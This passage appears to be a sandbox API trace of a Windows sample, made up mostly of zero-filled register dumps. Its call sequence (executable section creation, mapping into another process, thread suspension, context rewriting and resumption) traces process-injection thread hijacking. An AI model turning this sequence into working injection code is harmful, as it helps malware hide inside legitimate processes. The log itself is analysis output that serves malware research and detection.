[179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.573] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.573] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x118200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x119000) returned 0x0 [0195.581] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x118200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x2670000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x119000) returned 0x0 [0195.599] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.607] NtClose (Handle=0x10c) returned 0x0 [0195.607] NtSetContextThread (ThreadHandle=0xbc, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x45fc70, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x45fc18, Eip=0x26f5707, SegCs=0x23, EFlags=0x246, Esp=0x45fbfc, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.609] NtResumeThread (in: ThreadHandle=0xbc, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.609] NtClose (Handle=0x104) returned 0x0 [0195.609] NtClose (Handle=0xbc) returned 0x0 [0195.610] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x8e8, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0xbc) returned 0x0 [0195.610] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.610] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.610] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.610] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.616] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x8d8) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0195.617] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.617] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0xbc, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x1e70000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.626] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x46f900, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x46f8a8, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x46f88c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.627] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.627] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, 